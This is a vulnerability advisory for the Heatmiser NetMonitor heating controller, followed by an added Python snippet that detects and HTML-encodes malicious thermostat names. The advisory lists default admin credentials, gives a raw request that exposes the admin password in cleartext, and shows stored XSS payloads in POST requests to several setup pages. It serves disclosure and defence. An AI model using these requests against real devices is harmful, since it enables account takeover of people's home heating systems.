Heatmiser NetMonitor – Multiple Vulnerabilities

“The Heatmiser Netmonitor is a self contained unit allowing you to control your heating system over the internet from any web browser. Simply plug the Netmonitor in to your router and take complete control.” (Shodan search)

Affected: NetMonitor 1.04, 1.1, 3.02, 3.03, 3.7, 3.8 for the default credentials; 3.8 tested for the rest.

#1 Default Admin Credentials

According to the manual the default is admin / admin.

[Screenshot: heatmiser-login]

#2 Cleartext Admin Password Disclosure

GET /networkSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/left.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive

[Screenshot: heatmiser-cleart]

#3 Multiple Stored XSS (CVE-2013-78006)

Using the standard “>alert(‘DF’) XSS string, the following pages are vulnerable. They require admin authentication or can be exploited via cross-site request forgery (CSRF):

POST /statSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/statSetup.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive
Content-Length: 424
Content-Type: application/x-www-form-urlencoded

rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen%23Dining+Room%23Lounge%23Bed2+%26+En-suite%23Bed3%23″>alert(‘DF’)%23Upstairs+Rads%23Room+10%23Room+11%23Room+12%23Room+13%23Room+14%23Room+15%23Room+16%23Room+17%23Room+18%23Room+19%23Room+20%23Room+21%23Room+22%23Room+23%23Room+24%23Room+25%23Room+26%23Room+27%23Room+28%23Room+29%23Room+30%23Room+31%23Room+32&statmap=11111111100000000000000000000000

[Screenshot: heatmiser-xss1]

These pages are also affected:
/sensorSetup.htm – POST Method – snstitle, snstemp and snsalmen parameters (likely 8 more but didn’t test)
/inputSetup.htm – POST Method – inputtitle parameter
/outputSetup.htm – POST Method – outputtitle parameter

The rest of the setup pages are probably vulnerable since it didn’t seem like anything was being sanitized, but I didn’t have time to check.
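As an added defender-side illustration (not code from this advisory or from Heatmiser), the following Python parses a POST body in the statSetup.htm form layout shown above (thermostat names joined with # and URL-encoded), flags entries carrying HTML metacharacters, and contrasts the unescaped rendering with proper output encoding. The request body is a constructed sample, not a capture.

```python
import html
from urllib.parse import parse_qs

# Constructed sample body modelled on the advisory's POST to /statSetup.htm.
# One entry carries the '">' breakout pattern the advisory uses, followed by
# harmless markup, so the effect of (not) encoding is visible in the output.
SAMPLE_BODY = (
    "rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen"
    "%23%22%3E%3Cb%3EDF%3C%2Fb%3E%23Upstairs+Rads"
    "&statmap=11111111100000000000000000000000"
)

# Characters that let a stat name break out of an attribute or text node.
HTML_META = '<>"\''


def parse_stat_names(body: str) -> list:
    """URL-decode the form body and split statname into individual names."""
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("statname", [""])[0]
    return raw.split("#")


def suspicious_names(names) -> list:
    """Return the names containing HTML metacharacters.

    This is the input check the device lacks; a WAF rule or log review of
    statSetup.htm submissions could apply the same test.
    """
    return [n for n in names if any(c in n for c in HTML_META)]


def render_name_cell_unsafe(name: str) -> str:
    """Mirror the vulnerable behaviour: the name is echoed verbatim."""
    return f"<td>{name}</td>"


def render_name_cell_safe(name: str) -> str:
    """Hardened rendering: HTML-encode every name before it reaches the page."""
    return f"<td>{html.escape(name, quote=True)}</td>"


if __name__ == "__main__":
    names = parse_stat_names(SAMPLE_BODY)
    for n in suspicious_names(names):
        print("flagged:", repr(n))
        print("unsafe :", render_name_cell_unsafe(n))
        print("safe   :", render_name_cell_safe(n))
```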
